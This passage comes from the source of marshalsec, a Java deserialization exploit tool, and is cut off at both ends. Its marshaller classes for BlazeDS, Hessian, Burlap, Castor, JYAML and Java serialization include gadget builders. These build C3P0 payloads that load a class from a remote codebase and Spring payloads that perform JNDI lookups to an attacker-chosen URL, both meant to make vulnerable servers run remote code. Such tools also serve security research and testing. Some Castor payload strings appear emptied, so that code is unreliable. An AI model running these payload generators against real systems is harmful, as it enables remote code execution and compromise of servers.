| } 60 | 61 | 62 | /** 63 | * {@inheritDoc} 64 | * 65 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 66 | */ 67 | @Override 68 | public Object unmarshal ( byte[] data ) throws Exception { 69 | SerializationContext sc = new SerializationContext(); 70 | AmfxMessageDeserializer amfxMessageDeserializer = new AmfxMessageDeserializer(); 71 | amfxMessageDeserializer.initialize(sc, new ByteArrayInputStream(data), null); 72 | ActionMessage m = new ActionMessage(); 73 | amfxMessageDeserializer.readMessage(m, null); 74 | return m.getHeader(0).getData(); 75 | } 76 | 77 | 78 | @Override 79 | protected AbstractAmfOutput createOutput ( SerializationContext sc ) { 80 | return null; 81 | } 82 | 83 | 84 | @Override 85 | protected AbstractAmfInput createInput ( SerializationContext sc ) { 86 | return null; 87 | } 88 | 89 | 90 | public static void main ( String[] args ) { 91 | new BlazeDSAMFX().run(args); 92 | } 93 | 94 | } 95 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/BlazeDSBase.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | import java.util.ArrayList; 29 | import java.util.Arrays; 30 | import java.util.Collections; 31 | import java.util.LinkedHashMap; 32 | import java.util.List; 33 | import java.util.Map; 34 | 35 | import org.springframework.beans.factory.config.PropertyPathFactoryBean; 36 | import org.springframework.jndi.support.SimpleJndiBeanFactory; 37 | 38 | import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource; 39 | 40 | import flex.messaging.io.BeanProxy; 41 | import flex.messaging.io.SerializationContext; 42 | import flex.messaging.io.amf.AbstractAmfInput; 43 | import flex.messaging.io.amf.AbstractAmfOutput; 44 | import marshalsec.gadgets.Args; 45 | import marshalsec.gadgets.C3P0WrapperConnPool; 46 | import marshalsec.gadgets.SpringPropertyPathFactory; 47 | import marshalsec.util.Reflections; 48 | 49 | 50 | /** 51 | * 52 | * Not applicable: 53 | * - C3P0RefDataSource as a public constructor is required 54 | * - JdbcRowSet as there is custom conversion for RowSet sub-types 55 | * 56 | * @author mbechler 57 | * 58 | */ 59 | public abstract class BlazeDSBase extends MarshallerBase implements C3P0WrapperConnPool, SpringPropertyPathFactory { 60 | 61 | /** 62 | * {@inheritDoc} 63 | * 64 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 65 | */ 66 | @Override 67 | public byte[] marshal ( Object o ) throws Exception { 68 | SerializationContext sc = new SerializationContext(); 69 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 70 | try ( AbstractAmfOutput out = createOutput(sc) ) { 71 | out.setOutputStream(bos); 72 | out.writeObject(o); 73 | return bos.toByteArray(); 74 | } 75 | } 76 | 77 | 78 | protected abstract AbstractAmfOutput createOutput ( SerializationContext sc ); 79 | 80 | 81 | /** 82 | * {@inheritDoc} 83 | * 84 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 85 | */ 86 | @Override 87 | public Object unmarshal ( byte[] data ) throws Exception { 88 | SerializationContext sc = new SerializationContext(); 89 | try ( AbstractAmfInput in = createInput(sc) ) { 90 | in.setInputStream(new ByteArrayInputStream(data)); 91 | return in.readObject(); 92 | } 93 | } 94 | 95 | 96 | @Override 97 | @Args ( minArgs = 2, args = { 98 | "codebase", "class" 99 | }, defaultArgs = { 100 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 101 | } ) 102 | public Object makeWrapperConnPool ( UtilFactory uf, String[] args ) throws Exception { 103 | return new PropertyInjectingProxy( 104 | Reflections.createWithoutConstructor(WrapperConnectionPoolDataSource.class), 105 | Collections.singletonMap("userOverridesAsString", C3P0WrapperConnPool.makeC3P0UserOverridesString(args[ 0 ], args[ 1 ]))); 106 | } 107 | 108 | 109 | @Override 110 | @Args ( minArgs = 1, args = { 111 | "jndiUrl" 112 | }, defaultArgs = { 113 | MarshallerBase.defaultJNDIUrl 114 | } ) 115 | public Object makePropertyPathFactory ( UtilFactory uf, String[] args ) throws Exception { 116 | String jndiUrl = args[ 0 ]; 117 | PropertyInjectingProxy bfproxy = new PropertyInjectingProxy( 118 | new SimpleJndiBeanFactory(), 119 | Collections.singletonMap("shareableResources", Arrays.asList(jndiUrl) // this would actually be an array, 120 | // but AMFX has some trouble with 121 | // non-readable array properties 122 | )); 123 | 124 | Map values = new LinkedHashMap<>(); 125 | values.put("targetBeanName", jndiUrl); 126 | values.put("propertyPath", "foo"); 127 | values.put("beanFactory", bfproxy); 128 | return new PropertyInjectingProxy(new PropertyPathFactoryBean(), values); 129 | } 130 | 131 | 132 | protected abstract AbstractAmfInput createInput ( SerializationContext sc ); 133 | 134 | /** 135 | * 136 | * Bean proxy to support partial marshalling as well as ordering of properties and setting write-only properties 137 | * 138 | * @author mbechler 139 | * 140 | */ 141 | public final class PropertyInjectingProxy extends BeanProxy { 142 | 143 | private static final long serialVersionUID = 4559272383186706846L; 144 | private Map values; 145 | 146 | 147 | public PropertyInjectingProxy ( Object defaultInstance, Map v ) { 148 | super(defaultInstance); 149 | this.values = v; 150 | } 151 | 152 | 153 | @Override 154 | public List getPropertyNames ( Object instance ) { 155 | List l = super.getPropertyNames(instance); 156 | l.addAll(this.values.keySet()); 157 | return new ArrayList<>(this.values.keySet()); 158 | } 159 | 160 | 161 | @Override 162 | public boolean isWriteOnly ( Object instance, String propertyName ) { 163 | if ( this.values.containsKey(propertyName) ) { 164 | return false; 165 | } 166 | return super.isWriteOnly(instance, propertyName); 167 | } 168 | 169 | 170 | @Override 171 | public Object getValue ( Object instance, String propertyName ) { 172 | if ( this.values.containsKey(propertyName) ) { 173 | return this.values.get(propertyName); 174 | } 175 | return super.getValue(instance, propertyName); 176 | } 177 | } 178 | } 179 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/BlazeDSExternalizableBase.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import marshalsec.gadgets.UnicastRefGadget; 27 | 28 | 29 | /** 30 | * @author mbechler 31 | * 32 | */ 33 | public abstract class BlazeDSExternalizableBase extends BlazeDSBase implements UnicastRefGadget { 34 | 35 | } 36 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Burlap.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | 29 | import com.caucho.burlap.io.BurlapInput; 30 | import com.caucho.burlap.io.BurlapOutput; 31 | import com.caucho.hessian.io.AbstractHessianInput; 32 | import com.caucho.hessian.io.AbstractHessianOutput; 33 | 34 | 35 | /** 36 | * @author mbechler 37 | * 38 | */ 39 | public class Burlap extends HessianBase { 40 | 41 | /** 42 | * {@inheritDoc} 43 | * 44 | * @see marshalsec.AbstractHessianBase#createOutput(java.io.ByteArrayOutputStream) 45 | */ 46 | @Override 47 | protected AbstractHessianOutput createOutput ( ByteArrayOutputStream bos ) { 48 | return new BurlapOutput(bos); 49 | } 50 | 51 | 52 | /** 53 | * {@inheritDoc} 54 | * 55 | * @see marshalsec.AbstractHessianBase#createInput(java.io.ByteArrayInputStream) 56 | */ 57 | @Override 58 | protected AbstractHessianInput createInput ( ByteArrayInputStream bos ) { 59 | return new BurlapInput(bos); 60 | } 61 | 62 | 63 | public static void main ( String[] args ) { 64 | new Burlap().run(args); 65 | } 66 | 67 | } 68 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Castor.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.StringReader; 27 | import java.io.StringWriter; 28 | 29 | import org.exolab.castor.xml.Marshaller; 30 | import org.exolab.castor.xml.Unmarshaller; 31 | import org.exolab.castor.xml.XMLContext; 32 | 33 | import marshalsec.gadgets.Args; 34 | import marshalsec.gadgets.C3P0WrapperConnPool; 35 | import marshalsec.gadgets.SpringAbstractBeanFactoryPointcutAdvisor; 36 | 37 | 38 | /** 39 | * @author mbechler 40 | * 41 | */ 42 | public class Castor extends MarshallerBase implements SpringAbstractBeanFactoryPointcutAdvisor, C3P0WrapperConnPool { 43 | 44 | /** 45 | * {@inheritDoc} 46 | * 47 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 48 | */ 49 | @Override 50 | public String marshal ( Object o ) throws Exception { 51 | XMLContext context = new XMLContext(); 52 | Marshaller m = context.createMarshaller(); 53 | StringWriter sw = new StringWriter(); 54 | m.setWriter(sw); 55 | return sw.toString(); 56 | } 57 | 58 | 59 | /** 60 | * {@inheritDoc} 61 | * 62 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 63 | */ 64 | @Override 65 | public Object unmarshal ( String data ) throws Exception { 66 | XMLContext context = new XMLContext(); 67 | Unmarshaller unmarshaller = context.createUnmarshaller(); 68 | return unmarshaller.unmarshal(new StringReader(data)); 69 | } 70 | 71 | 72 | @Override 73 | @Args ( minArgs = 1, args = { 74 | "jndiUrl" 75 | }, defaultArgs = { 76 | MarshallerBase.defaultJNDIUrl 77 | } ) 78 | public Object makeBeanFactoryPointcutAdvisor ( UtilFactory uf, String[] args ) throws Exception { 79 | String jndiName = args[ 0 ]; 80 | return "" 82 | + "" + jndiName + "foo" 83 | + "" + "" + jndiName 84 | + ""; 85 | } 86 | 87 | 88 | @Override 89 | @Args ( minArgs = 2, args = { 90 | "codebase", "class" 91 | }, defaultArgs = { 92 | MarshallerBase.defaultCodebase, MarshallerBase.defaultCodebaseClass 93 | } ) 94 | public Object makeWrapperConnPool ( UtilFactory uf, String[] args ) throws Exception { 95 | return ""; 98 | } 99 | 100 | 101 | public static void main ( String[] args ) { 102 | new Castor().run(args); 103 | } 104 | } 105 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/EscapeType.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | /** 27 | * @author mbechler 28 | * 29 | */ 30 | public enum EscapeType { 31 | 32 | NONE, JAVA 33 | } 34 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Hessian.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | 29 | import com.caucho.hessian.io.AbstractHessianInput; 30 | import com.caucho.hessian.io.AbstractHessianOutput; 31 | import com.caucho.hessian.io.HessianInput; 32 | import com.caucho.hessian.io.HessianOutput; 33 | 34 | 35 | /** 36 | * @author mbechler 37 | * 38 | */ 39 | public class Hessian extends HessianBase { 40 | 41 | /** 42 | * {@inheritDoc} 43 | * 44 | * @see marshalsec.AbstractHessianBase#createOutput(java.io.ByteArrayOutputStream) 45 | */ 46 | @Override 47 | protected AbstractHessianOutput createOutput ( ByteArrayOutputStream bos ) { 48 | return new HessianOutput(bos); 49 | } 50 | 51 | 52 | /** 53 | * {@inheritDoc} 54 | * 55 | * @see marshalsec.AbstractHessianBase#createInput(java.io.ByteArrayInputStream) 56 | */ 57 | @Override 58 | protected AbstractHessianInput createInput ( ByteArrayInputStream bos ) { 59 | return new HessianInput(bos); 60 | } 61 | 62 | 63 | public static void main ( String[] args ) { 64 | new Hessian().run(args); 65 | } 66 | 67 | } 68 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Hessian2.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | 29 | import com.caucho.hessian.io.AbstractHessianInput; 30 | import com.caucho.hessian.io.AbstractHessianOutput; 31 | import com.caucho.hessian.io.Hessian2Input; 32 | import com.caucho.hessian.io.Hessian2Output; 33 | 34 | 35 | /** 36 | * @author hex0wn 37 | * 38 | */ 39 | public class Hessian2 extends HessianBase { 40 | 41 | /** 42 | * {@inheritDoc} 43 | * 44 | * @see marshalsec.AbstractHessianBase#createOutput(java.io.ByteArrayOutputStream) 45 | */ 46 | @Override 47 | protected AbstractHessianOutput createOutput ( ByteArrayOutputStream bos ) { 48 | return new Hessian2Output(bos); 49 | } 50 | 51 | 52 | /** 53 | * {@inheritDoc} 54 | * 55 | * @see marshalsec.AbstractHessianBase#createInput(java.io.ByteArrayInputStream) 56 | */ 57 | @Override 58 | protected AbstractHessianInput createInput ( ByteArrayInputStream bos ) { 59 | return new Hessian2Input(bos); 60 | } 61 | 62 | 63 | public static void main ( String[] args ) { 64 | new Hessian2().run(args); 65 | } 66 | 67 | } 68 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/HessianBase.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | 29 | import com.caucho.hessian.io.AbstractHessianInput; 30 | import com.caucho.hessian.io.AbstractHessianOutput; 31 | import com.caucho.hessian.io.HessianProtocolException; 32 | import com.caucho.hessian.io.Serializer; 33 | import com.caucho.hessian.io.SerializerFactory; 34 | import com.caucho.hessian.io.UnsafeSerializer; 35 | import com.caucho.hessian.io.WriteReplaceSerializer; 36 | 37 | import marshalsec.gadgets.Resin; 38 | import marshalsec.gadgets.Rome; 39 | import marshalsec.gadgets.SpringAbstractBeanFactoryPointcutAdvisor; 40 | import marshalsec.gadgets.SpringPartiallyComparableAdvisorHolder; 41 | import marshalsec.gadgets.XBean; 42 | 43 | 44 | /** 45 | * 46 | * Not applicable: 47 | * - BindingEnumeration/LazySearchEnumeration/ServiceLoader/ImageIO: custom conversion of Iterator 48 | * 49 | * @author mbechler 50 | * 51 | */ 52 | public abstract class HessianBase extends MarshallerBase 53 | implements SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin { 54 | 55 | /** 56 | * {@inheritDoc} 57 | * 58 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 59 | */ 60 | @Override 61 | public byte[] marshal ( Object o ) throws Exception { 62 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 63 | AbstractHessianOutput out = createOutput(bos); 64 | NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory(); 65 | sf.setAllowNonSerializable(true); 66 | out.setSerializerFactory(sf); 67 | out.writeObject(o); 68 | out.close(); 69 | return bos.toByteArray(); 70 | } 71 | 72 | 73 | /** 74 | * {@inheritDoc} 75 | * 76 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 77 | */ 78 | @Override 79 | public Object unmarshal ( byte[] data ) throws Exception { 80 | ByteArrayInputStream bis = new ByteArrayInputStream(data); 81 | AbstractHessianInput in = createInput(bis); 82 | return in.readObject(); 83 | } 84 | 85 | 86 | /** 87 | * @param bos 88 | * @return 89 | */ 90 | protected abstract AbstractHessianOutput createOutput ( ByteArrayOutputStream bos ); 91 | 92 | 93 | protected abstract AbstractHessianInput createInput ( ByteArrayInputStream bos ); 94 | 95 | public static class NoWriteReplaceSerializerFactory extends SerializerFactory { 96 | 97 | /** 98 | * {@inheritDoc} 99 | * 100 | * @see com.caucho.hessian.io.SerializerFactory#getObjectSerializer(java.lang.Class) 101 | */ 102 | @Override 103 | public Serializer getObjectSerializer ( Class cl ) throws HessianProtocolException { 104 | return super.getObjectSerializer(cl); 105 | } 106 | 107 | 108 | /** 109 | * {@inheritDoc} 110 | * 111 | * @see com.caucho.hessian.io.SerializerFactory#getSerializer(java.lang.Class) 112 | */ 113 | @Override 114 | public Serializer getSerializer ( Class cl ) throws HessianProtocolException { 115 | Serializer serializer = super.getSerializer(cl); 116 | 117 | if ( serializer instanceof WriteReplaceSerializer ) { 118 | return UnsafeSerializer.create(cl); 119 | } 120 | return serializer; 121 | } 122 | 123 | } 124 | 125 | } 126 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/JYAML.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import org.ho.yaml.Yaml; 27 | 28 | import marshalsec.gadgets.C3P0RefDataSource; 29 | import marshalsec.gadgets.C3P0WrapperConnPool; 30 | import marshalsec.gadgets.JdbcRowSet; 31 | 32 | 33 | /** 34 | * @author mbechler 35 | * 36 | */ 37 | public class JYAML extends YAMLBase implements JdbcRowSet, C3P0RefDataSource, C3P0WrapperConnPool { 38 | 39 | /** 40 | * {@inheritDoc} 41 | * 42 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 43 | */ 44 | @Override 45 | public String marshal ( Object o ) throws Exception { 46 | return Yaml.dump(o); 47 | } 48 | 49 | 50 | /** 51 | * {@inheritDoc} 52 | * 53 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 54 | */ 55 | @Override 56 | public Object unmarshal ( String data ) throws Exception { 57 | return Yaml.loadType(data, Object.class); 58 | } 59 | 60 | 61 | @Override 62 | protected boolean constructorArgumentsSupported () { 63 | return false; 64 | } 65 | 66 | 67 | @Override 68 | protected String constructorPrefix ( boolean inline ) { 69 | if ( !inline ) { 70 | return "foo: !"; 71 | } 72 | return "!"; 73 | } 74 | 75 | 76 | public static void main ( String[] args ) { 77 | new JYAML().run(args); 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Java.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayInputStream; 27 | import java.io.ByteArrayOutputStream; 28 | import java.io.ObjectInputStream; 29 | import java.io.ObjectOutputStream; 30 | import java.util.Comparator; 31 | 32 | import marshalsec.gadgets.CommonsBeanutils; 33 | import marshalsec.gadgets.JDKUtil; 34 | import marshalsec.gadgets.XBean; 35 | 36 | 37 | /** 38 | * @author mbechler 39 | * 40 | */ 41 | public class Java extends MarshallerBase implements CommonsBeanutils, XBean { 42 | 43 | /** 44 | * {@inheritDoc} 45 | * 46 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 47 | */ 48 | @Override 49 | public byte[] marshal ( Object o ) throws Exception { 50 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 51 | try ( ObjectOutputStream oos = new ObjectOutputStream(bos) ) { 52 | oos.writeObject(o); 53 | } 54 | return bos.toByteArray(); 55 | } 56 | 57 | 58 | /** 59 | * {@inheritDoc} 60 | * 61 | * @see 